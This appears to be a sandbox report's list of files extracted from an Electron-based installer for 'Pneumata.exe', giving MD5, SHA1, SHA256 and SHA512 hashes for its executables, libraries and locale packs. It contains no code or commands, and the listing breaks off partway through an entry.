SHA512 ea0cc7cfd59cd7ccb742f60fa4891ca022493e237dce4d99649115b9109b4d87ac67c610e0c18d0b4d4ea961d4e87c3353905be4977fa945a4246283d9fb88c2

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\LICENSES.chromium.html

MD5 42ff859154e417a1960bc3c66baba595
SHA1 ed9efeca174d4c33c475e0f56845413303880b7d
SHA256 53a571e5acf339497aba52e5513e8e5adb2ef49b13a0fd9368e7d47b9dab27a4
SHA512 cd8bb3b4afbc4a7257c8212fd27f626981dd7fc2b3cd1245122724cf3b7943f8cdfd13bf4abd1f89914a22b01c21973518076a9344de2f20d0337183b32c801d

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\vulkan-1.dll

MD5 b91586bd80e057a7f62bdc4422744812
SHA1 a1df644421ece2e740e5bf0ed98b4f269fd85c39
SHA256 8ba72d98e0f78b77bda7816cd7232809d287310d34e0f1d7472b9d5fda2c6d02
SHA512 94f0a8e3e75e4803891c0fcb257052dbe0e7399772fc7a46ab802629f76ee580ed30b3678fa6bc3744c12cf9f3103bbc8276e88f6711278748148e9fbeef2053

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\vk_swiftshader.dll

MD5 4f3afa94ebdcabe7f078425537a9b1b9
SHA1 edf08ef8040aa1f4252d82720d191a848eafa762
SHA256 04065d898ecd00d31692d3405b33fd908923390ced740f543cf6c2959a0406e9
SHA512 ce5c986cdfba8798a92e04720c4988b23ec9ab281c1ca5ddd94c731f5c867c248e0c7f71890779d30544b591117c8c8138ac6444cb322b650e1671ab4af6b3fc

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\v8_context_snapshot.bin

MD5 47014c0f81bad6d216c617c9c63bf040
SHA1 7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf
SHA256 e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178
SHA512 052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\snapshot_blob.bin

MD5 c9ab741bbef53fa0e84952b8891a5f5a
SHA1 e2dcb8d034e07243537c86371de0c52bce62cee1
SHA256 4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4
SHA512 177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\resources.pak

MD5 6b830c9cad09f8bc8146cc58d95f0e11
SHA1 bcc75cbf0e06ff21859c0a543eb04095395a1984
SHA256 37c09624d66b668f5685cbfca8763e38f1773e5ce3ca2eaa4f8d55d59160bc39
SHA512 2c5193086f4046dcce2b40e529aae4bb793366edd5e0daa50176711ac78c656850fa084334345897f90d2b91f75e25733a6b72e8957a6764fbc066a3f72ed353

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\Pneumata.exe

MD5 751b6c39e72854ed74fa9071fe4852fd
SHA1 940d540017c6451617e4c0cb71c668f5ca9b82ab
SHA256 f5b34bce482e1c6d1f6cc841f1577f7fb65f0f1df42eaa4c87f0eb28989162ec
SHA512 599fe5400a3f58741d29b5043d55516e705a64b593951985ceedb78cef1e15a4edcec22a1f8e2b8b69c434f0f98c3b626e9b70d7e4c9e80b047a431611f52b51

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\el.pak

MD5 38440b98bfdf5ed496da0f49d59534c0
SHA1 1498d9207ecaf4923a47271e24c68a817041c82e
SHA256 b1f78df8a7edc914357a2e90bc8dc0ac46f4df642bb22894569fe4905fb8ea0f
SHA512 95ba788fc2e1f07d54e398f1ec4d32c664cfb13118d46cb7af7a993367e032b10de84f3e604ab6e659d6410e2d736097ec5e9b3b002040c54412358f0ea10229

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\gu.pak

MD5 63a7fdc4eadf8ef1c35c72468a0ce33f
SHA1 e8d064f0e9c8a6a8c6ccb036711e292d011d9466
SHA256 e549ff4e5a094d04c2ce7bc6fd68bea1f03e935437bf164bebb6191c133fa70c
SHA512 0a097ff875132a984545ec677b04f97785f14c38a1df487cfb4722cdea07d14e1e88fcff7d58b82fa53f05f4eba779a95ef320b5a91692097726d0385a26a456

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\hi.pak

MD5 590e9e73df9cbd83cd87b9c03848fec9
SHA1 da125e60a5a2c51a2d6219d3f81688bd22237b59
SHA256 089b9dd31090a987515809a68d26f6eeb64cd9283934e3dcc48b151eec7d3ad9
SHA512 fd0e5d0f2063e12b711275f390428b88f98ffaf6043cdb14b13674ac1e4aa9f70ae820ae960132d7155daf9b1308238775c4702694ab53068cdc709c50f9186a

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\kn.pak

MD5 5115cde84b4c674db412619b65433004
SHA1 164f33e7e2e9f685a579da492a6fc8806beb6cbf
SHA256 891e092c6895e23be986c3e6d39dcea9b6b75f1448239c13fd406680e50407a7
SHA512 090a247898cb533325d2b289a6cbd8db2a755ef0abab49d82f333e57b290c50b5996b81f15d8adc30160b216eebed3a1476aec1627195e52189557c1d48b0216

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
